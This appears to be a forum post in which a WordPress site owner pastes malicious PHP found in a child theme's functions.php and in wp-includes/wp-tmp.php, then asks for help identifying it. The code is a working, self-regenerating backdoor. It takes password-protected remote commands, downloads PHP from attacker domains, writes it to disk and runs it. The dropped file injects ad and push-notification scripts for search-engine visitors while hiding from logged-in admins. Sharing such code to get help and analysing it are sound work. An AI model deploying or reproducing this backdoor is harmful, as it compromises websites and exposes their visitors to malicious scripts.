I found the following code in a child theme's functions.php
Even if you delete it it re-generates automatically
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '39790f7c9b39216528df57a9c6c72032')) {
$div_code_name = "wp_vcd";
switch ($_REQUEST['action']) {
case 'change_domain';
if (isset($_REQUEST['newdomain'])) {
if (!empty($_REQUEST['newdomain'])) {
if ($file = @file_get_contents(__FILE__)) {
if (preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i', $file, $matcholddomain)) {
$file = preg_replace('/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
case 'change_code';
if (isset($_REQUEST['newcode'])) {
if (!empty($_REQUEST['newcode'])) {
if ($file = @file_get_contents(__FILE__)) {
if (preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i', $file, $matcholdcode)) {
$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
default:
print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
die("");
}
$div_code_name = "wp_vcd";
$funcfile = __FILE__;
if (!function_exists('theme_temp_setup')) {
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
if (fwrite($handle, "<?php\n" . $phpCode)) {
} else {
$tmpfname = tempnam('./', "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
}
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}
$wp_auth_key = '0bb00640fa54049fc4c2c5e080f9f51a';
if (($tmpcontent = @file_get_contents("http://www.facocs.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.facocs.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
} elseif ($tmpcontent = @file_get_contents("http://www.facocs.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
} elseif ($tmpcontent = @file_get_contents("http://www.facocs.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
} elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
}
}
}
I don't understand exactly what it does yet. It seems to download php code from some website and puts it in wp-includes/wp-tmp.php
Here's the content of wp-includes/wp-tmp.php
:
ini_set('display_errors', 0);
error_reporting(0);
$wp_auth_key = '0bb00640fa54049fc4c2c5e080f95f1a';
$file = file_get_contents(get_template_directory() . '/functions.php');
$filec = file_get_contents(get_stylesheet_directory() . '/functions.php');
$rep = "dacocs.top";
$repw = "dacocs.xyz";
if (stripos($file, $rep) !== false) {
$new_file = str_replace($rep, $repw, $file);
@file_put_contents(get_template_directory() . '/functions.php', $new_file);
}
if (stripos($filec, $rep) !== false) {
$new_filec = str_replace($rep, $repw, $filec);
@file_put_contents(get_stylesheet_directory() . '/functions.php', $new_filec);
}
if (!function_exists('slider_option')) {
function slider_option($content)
{
if (is_single()) {
$con = '
';
$con2 = '
<script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1610264"></script>
<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1610267&interactive=1&pushup=1"></script>
';
$content = $content . $con2;
}
return $content;
}
function slider_option_footer()
{
if (!is_single()) {
$con2 = '
<script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1610264"></script>
<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1610267&interactive=1&pushup=1"></script>
';
echo $con2;
}
}
function setting_my_first_cookie()
{
setcookie('wordpress_cf_adm_use_adm', 1, time() + 3600 * 24 * 1000, COOKIEPATH, COOKIE_DOMAIN);
}
if (is_user_logged_in()) {
add_action('init', 'setting_my_first_cookie', 1);
}
if (current_user_can('edit_others_pages')) {
if (file_exists(ABSPATH . 'wp-includes/wp-feed.php')) {
$ip = @file_get_contents(ABSPATH . 'wp-includes/wp-feed.php');
}
if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false) {
$ip .= $_SERVER['REMOTE_ADDR'] . '
';
@file_put_contents(ABSPATH . 'wp-includes/wp-feed.php', $ip);
}
}
$ref = $_SERVER['HTTP_REFERER'];
$SE = array(
'google.',
'/search?',
'images.google.',
'web.info.com',
'search.',
'yahoo.',
'yandex',
'msn.',
'baidu',
'bing.',
'doubleclick.net',
'googleweblight.com'
);
foreach ($SE as $source) {
if (strpos($ref, $source) !== false) {
setcookie("sevisitor", 1, time() + 120, COOKIEPATH, COOKIE_DOMAIN);
$sevisitor = true;
}
}
if (!isset($_COOKIE['wordpress_cf_adm_use_adm']) && !is_user_logged_in()) {
$adtxt = @file_get_contents(ABSPATH . 'wp-includes/wp-feed.php');
if (stripos($adtxt, $_SERVER['REMOTE_ADDR']) === false) {
if ($sevisitor == true || isset($_COOKIE['sevisitor'])) {
add_filter('the_content', 'slider_option');
add_action('wp_footer', 'slider_option_footer');
}
}
}
}
Has anybody encountered something like this before ?